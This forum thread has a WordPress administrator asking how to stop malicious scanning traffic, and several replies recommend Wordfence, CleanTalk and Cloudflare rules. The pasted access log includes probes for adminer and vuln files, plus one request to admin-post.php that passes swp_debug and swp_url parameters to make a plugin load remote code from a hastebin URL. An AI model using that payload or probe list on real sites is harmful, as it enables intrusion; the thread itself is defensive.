How to stop getting regularlly slammed by malicious traffic once and for all?

[ad_1]

Hi there, I manage a bunch of WordPress sites, mostly on Cloudways. I regularly find my CPU has been stuck near 100% and whenever I am able to figure out which application is the cause (not easy on Cloudways unless the attack is happening right now, then you can use Application Wise) it’s usually some foreign IP hitting all sorts of random urls. I’m behind Cloudflare, but it doesn’t usually stop it and I have to go manually block the IP once I discover what it is. I’m getting really fed up with this as it regularly brings down my client websites and it seems that this kind of traffic should be detectable and easily blocked by some kind of service or plugin. Any recommendations to protect against this?

Examples of the kind of traffic hitting random addresses, clearly looking for something to exploit:

[51.79.142.56]) \- – \[01/Feb/2023:05:31:50 +0000\] “GET /wp-content/plugins/iwp-client/readme.txt HTTP/1.1” 404 78848 “-” “Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0”

[51.79.142.56]) \- – \[01/Feb/2023:05:31:53 +0000\] “GET /wp-admin/admin-post.php?swp\_debug=load\_options&swp\_url=https://hastebin.com/raw/etonipusij HTTP/1.1” 200 319 “-” “Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0”

[51.79.142.56]) \- – \[01/Feb/2023:05:31:55 +0000\] “GET /wp-admin/vuln.php HTTP/1.1” 404 78868 “-” “Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0”

[51.79.142.56]) \- – \[01/Feb/2023:05:31:57 +0000\] “GET /wp-admin/vuln.htm HTTP/1.1” 404 78868 “-” “Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0”

[51.79.142.56]) \- – \[01/Feb/2023:05:32:20 +0000\] “GET /adminer.php HTTP/1.1” 404 78908 “-” “Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0”

[51.79.142.56]) \- – \[01/Feb/2023:05:32:20 +0000\] “GET /wp-admin/mysql-adminer.php HTTP/1.1” 404 78886 “-” “Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0”

[51.79.142.56]) \- – \[01/Feb/2023:05:32:21 +0000\] “GET /wp-admin/adminer.php HTTP/1.1” 404 78874 “-” “Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0”

[51.79.142.56]) \- – \[01/Feb/2023:05:32:22 +0000\] “GET /mysql-adminer.php HTTP/1.1” 404 78914 “-” “Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0”

[51.79.142.56]) \- – \[01/Feb/2023:05:32:23 +0000\] “GET /adminer/adminer.php HTTP/1.1” 404 78867 “-” “Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0”

[51.79.142.56]) \- – \[01/Feb/2023:05:32:24 +0000\] “GET /upload/adminer.php HTTP/1.1” 404 78874 “-” “Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0”

[51.79.142.56]) \- – \[01/Feb/2023:05:32:25 +0000\] “GET /adminer/adminer-4.7.0.php HTTP/1.1” 404 78886 “-” “Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0”

[51.79.142.56]) \- – \[01/Feb/2023:05:32:25 +0000\] “GET /wp-content/adminer.php HTTP/1.1” 404 78867 “-” “Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0”

[51.79.142.56]) \- – \[01/Feb/2023:05:32:27 +0000\] “GET /wp-content/uploads/adminer.php HTTP/1.1” 403 451 “-” “Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0”

[51.79.142.56]) \- – \[01/Feb/2023:05:32:26 +0000\] “GET /uploads/adminer.php HTTP/1.1” 404 78874 “-” “Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0”

[51.79.142.56]) \- – \[01/Feb/2023:05:32:28 +0000\] “GET /adminer/ HTTP/1.1” 404 78899 “-” “Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0”

[51.79.142.56]) \- – \[01/Feb/2023:05:32:28 +0000\] “GET /\_adminer.php HTTP/1.1” 404 78902 “-” “Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0”

[51.79.142.56]) \- – \[01/Feb/2023:05:32:29 +0000\] “GET /mirasvit\_adminer\_mysql.php HTTP/1.1” 404 78923 “-” “Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0”

[ad_2]
5 Comments

  1. Install Wordfence and check its log to see where the hits are coming from i.e. what country.

    Then setup these rules in your CF WAF [https://gridpane.com/blog/cloudflare-firewall-rules-for-securing-wordpress-websites/]). I usually setup a rule to block all of the “problem” countries (which you can ascertain from Wordfence), and Managed Challenge countries that might be problematic but you still need traffic from.

    That will stop 95% of junk traffic that you don’t need.

  2. Use ReCaptcha on wp-admin. Disable xmlrpc, especially if you don’t need it. Turn on auto bans for failed password login attempts and non-existing usernames in Wordfence. Turn on auto-updates for all plugins. Double check all your Cloudflare and Wordfence settings. Make sure you are running the current version of PHP. Check for security settings within Cloudways. Make sure Cloudways is installing all your newest server security patches.

  3. We use the clean talk plug in. I am not sure if it would block these, as I most likely have other bots knocking than you, but it seems to work fine for us.

  4. Wordfence and CleanTalk. I install both on every site. When a website is “mission critical” I upgrade to the paid Wordfence. This has worked for my sites so far. I’ll still occasionally get a burst of this sort, but Wordfence blocks it pretty quick. I’ll see it in the logs.

    Make sure you have the Wordfence firewall running.

  5. Also look into blocking some of that traffic at the server level if you have access and SSH. It’s better to stop undesired traffic before it gets to your sites.

 

This site will teach you how to build a WordPress website for beginners. We will cover everything from installing WordPress to adding pages, posts, and images to your site. You will learn how to customize your site with themes and plugins, as well as how to market your site online.

Buy WordPress Transfer